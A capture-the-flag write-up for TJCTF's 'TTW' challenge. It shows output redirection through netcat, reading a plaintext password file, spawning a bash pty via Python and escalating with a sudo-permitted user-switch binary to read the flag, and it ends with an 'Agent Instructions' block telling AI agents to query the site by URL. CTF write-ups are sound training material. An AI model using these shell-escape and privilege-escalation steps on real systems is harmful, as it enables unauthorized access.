# TTW So, what a mess this was. Firstly, we started by performing a timing attack. That managed to get us quite a lot of things, but it was annoying having to wait 5 minutes for some results. So lets look for a better option. Looking at the hint, it says to think about I/O. Hmmm, ok. Connecting through netcat, it prints out "Imagine having a usable terminal". Ok, interesting. If we try and enter in a command, it doesn't output anything. Odd. We can probably assume that all our commands are being sent to `/dev/null`, where they just get wiped away. What if we could trick the connection to redirect our commands anywhere, instead of `/dev/null`. If we know that `2>/dev/null` sends any errors there, we can redirect our output to the input as we're connected there, doing `>&0`. Once we've done some enum, we can use the name of the challenge "TT Why" (sounding like TTY) to spawn a tty shell, where we can run sudo -l (as password.txt has problem-user password) to see that we can run `/usr/bin/chguser` as root. Changing user, navigating to home folder, then to flag, we get flag.txt ``` >ls -alR ./ >&0 message.txt password.txt ``` ``` > cat message.txt Man, I just sure wish I could impersonate other_user ``` ``` > cat password.txt Password for problem user: 1234qwer ``` ``` > python -c 'import pty; pty.spawn("/bin/bash")' >&0 ``` ```bash $ sudo -l (root) /usr/bin/chguser ``` ```bash $ sudo /usr/bin/chguser other-user Password: 1234qwer ``` ```bash $ ls -alR ./flag: flag.txt ``` ```bash $ cat flag/flag.txt ``` ## tjctf{ptys\_sure\_are\_neat} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://the-winrars.gitbook.io/writeups/2020-writeups/tjctf/ttw.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.